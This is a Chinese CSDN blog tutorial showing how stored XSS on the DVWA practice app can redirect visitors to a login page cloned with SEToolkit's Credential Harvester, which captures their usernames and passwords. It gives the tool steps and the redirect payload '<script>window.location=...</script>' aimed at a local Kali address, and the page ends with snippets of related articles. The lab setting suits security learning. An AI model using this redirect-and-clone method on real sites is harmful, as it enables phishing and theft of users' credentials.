Web安全-XSS-基础04

已于 2022-03-03 10:45:43 修改
阅读量1k 收藏 3
点赞数 1
分类专栏: Web安全-XSS 文章标签: web安全 xss盗取用户信息
于 2022-02-14 16:11:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/122924981
版权

XSS盗取用户信息

一、盗取用户信息原理

首先克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆的登录页面,用户输入登录,账号和密码被存储。
在这里插入图片描述
1、用户登陆网站,我们实现利用网站的存储型xss漏洞,设置好跳转链接
2、当用户访问到XSS处,页面跳转到克隆的登陆界面
3、此时若用户进一步输入账号密码,那么我们的目的就达成了!

二、测试

2.1 克隆登陆网站

此处以dvwa登陆界面为例

在这里插入图片描述

下一步我们就需要克隆该站点:

这里需要用到kali下的setoolkit工具
SEToolkit使用流程:

  1. sudo setooklit (打开setookit工具)
  2. 选择Social-Engineering Attacks
  3. 选择Website Attack Vectors
  4. 选择Credential Harvester Attack Method
  5. 选择Site Cloner,输入要克隆的网址

输入网址那一步时,先回车,再输入我们想要克隆的站点链接
在这里插入图片描述
在这里插入图片描述
此时已经克隆完成!

浏览器访问kali的IP地址即可!
伪站点url:192.168.137.128也就是kali的ip地址
在这里插入图片描述

2.2 利用XSS漏洞盗取用户信息

构建payload,依旧以dvwa为例
在存储型xss漏洞处:

<script>window.location="http://192.168.137.128/"</script>

使网页重定向到我们的伪站点

在这里插入图片描述
直接跳转到了我们自己克隆的站点了
在这里插入图片描述
输入用户名和密码后不会有反应,回到kali可以发现用户名和密码
在这里插入图片描述
参考链接:
https://blog.csdn.net/qq_45884195/article/details/107136606

Stray.io
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2605
xss学习笔记
xss跳转代码_XSS漏洞(恶意链接)
weixin_39994806的博客
11-20 1383
一、环境:DVWA二、修改网页链接1、点击下面的网址,访问的是不同的内容2、通过xss漏洞,修改这些网址都指向百度window.onload:当窗口加载时,执行匿名函数<script>window.onload=function(){ var link=document.getElementsByTagName("a"); for(j=0;j<link.length;j++){ ...
web:常见安全问题
snowball的博客
12-21 1163
对进入数据库的特殊字符(',",,,&,*,;我们保证所有生成的链接都是来自于我们可信域的,通过在生成的链接里加入用户不可控的Token对生成的链接进行校验,可以避免用户生成自己的恶意链接从而被利用,但是如果功能本身要求比较开放,可能导致有一定的限制。CSRF(Cross Site Request Forgery),即跨站请求伪造,是一种常见的web攻击,它利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法的操作。也就是说,通过命令注入攻击可执行操作系统上安装着的各种程序。
在知乎上给评论加入跳转链接--XSS练手
juanjuanguai的专栏
01-15 6298
今天在知乎上看到一个有意思的问题和回答,原链接在此: https://www.zhihu.com/question/39019943#answer-27137376 大家在下面可以用链接作为回复内容 链接到一些其他内容里去。 然而知乎本身就有过滤,所以需要绕过过滤才可以。 自己写的不好,找了找别人写的,加以修改就可以了 <a href=
【应用安全xss二】xss攻击介绍和防范(前端)
qq_35789269的博客
04-07 3384
本文我们会讲解 XSS ,主要包括: XSS 攻击的介绍 XSS 攻击的分类 XSS 攻击的预防和检测 XSS 攻击的总结 XSS 攻击案例 XSS 攻击的介绍 在开始本文之前,我们先提出一个问题,请判断以下两个说法是否正确: XSS 防范是后端 RD(研发人员)的责任,后端 RD 应该在所有用户提交数据的接口,对敏感字符进行转义,才能进行下一步操作。 所有要插入到页面上的数据,都要通过一个敏感字符过滤函数的转义,过滤掉通用的敏感字符后,就可以插入到页面中。 如果你还不能确定答案,那么可以带
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
web--xss:web安全xss攻击、以及如何防范
05-18
Web XSS(跨站脚本)攻击是网络安全领域中一种常见的威胁,主要针对Web应用程序。XSS攻击通过在用户的浏览器中注入恶意脚本,利用网站的信任关系来窃取用户数据、执行非授权操作或者进行钓鱼攻击。本文将深入探讨XSS...
WEB安全基础-合集篇
10-23
WEB安全基础—合集篇,包含基础SQL注入、文件上传、XSS、CSRF、文件包含、逻辑漏洞等。适合新手上手参考学习,通过本文档,可以快速了解渗透测试。
XSS跨站脚本(web应用)——XSS相关工具及使用(四)
Gjqhs的博客
02-24 2060
本章目的 普及XSS相关工具的简单使用,在DVWA中练习Dom型XSS方法 DVWA Dom XSS 相关代码 将get参数中的default的值写入页面中的<option>节点 if (document.location.href.indexOf("default=")>=0){var lang = document.location.href.substring( document.location.href.indexOf("default=")+8);document.
超全的安全测试汇总
热门推荐
weixin_44602565的博客
03-10 1万+
1.安全测试在做什么? 扫描?在很多人的眼中,做安全的就是整天拿个工具在哪里做扫描操作,使用各种不同的工具做扫描。是的,扫描是安全测试的很重要的一部分,扫描可以快速有效的发现问题。扫描工具的易用性、方便性决定了重要地位。但是扫描工具的局限性、程序的不够灵活等缺点也是显而易见的。不管是扫描报告的分析、漏洞的深度挖掘、测试的组织等等的工作都离不开安全测试人员,所以只能说扫描工具减轻了测试人员的工作量,是安全测试的一种手段。 2.安全测试者是怎样定位自己的? 我们经常可以从身边的朋友口中听到一些有关安全的名称,向
xss跳转代码_XSS(跨站脚本攻击)
weixin_39564831的博客
11-20 1772
XSS攻击流程 1、攻击者将恶意代码注入到服务器中 2、用户在没有防备的情况下访问服务器 3、服务器将含有恶意代码的网页响应给客户端 4、在客户端浏览器中触发恶意的JS代码XSS危害 1、盗取各种用户账号 2、窃取用户Cookie资料,冒充用户身份进入网站 3、劫持用户会话,执行任意操作 4、刷流量,执行弹窗广告 5、传播病毒XSS漏洞的验证 POC 漏洞的验证与检测 E...
setoolkit克隆网站获取用户信息
BeatRex的博客
05-24 2681
一、环境 kali、DVWA 二、步骤 首先打开kali,输入setoolkit 依次选择选项1-选项2-选项3-选项2 输入钓鱼网站的网址(默认为本地网址) 输入要克隆的网址URL 这里我的网址如图,将网址复制 然后模拟攻击场景,攻击者向受害者发送了一条钓鱼链接,此链接与DVWA的登陆页面完全一样,受害者点击之后并进行登陆信息 点击login之后,用户信息就被setool...
从密码学角度看网络安全:加密技术的最新进展
A526847的博客
08-20 638
在数字化时代,网络安全已成为不可忽视的重大问题。随着计算机技术和网络应用的飞速发展,黑客和网络攻击手段日益复杂,对个人、企业乃至国家的信息安全构成了严重威胁。密码学作为网络安全领域的核心支柱,其发展对于保护信息安全具有至关重要的作用。本文将探讨加密技术的最新进展,以及这些进展如何助力网络安全
网络安全(黑客)——自学2024
2401_84466325的博客
08-21 1547
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-18 1618
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1010
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
如何用3个月零基础入门网络安全?_网络安全基础怎么学习
最新发布
2401_84466224的博客
08-23 1133
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
理解Web安全基础XSS漏洞详解与防护
"007-Web安全基础3 - XSS漏洞.pptx" 这篇文档主要讲解了Web安全领域中的一个重要话题——XSS(Cross Site Scripting)漏洞,它是一种允许恶意攻击者在Web页面中注入可执行脚本的漏洞。XSS攻击的主要目标是欺骗用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值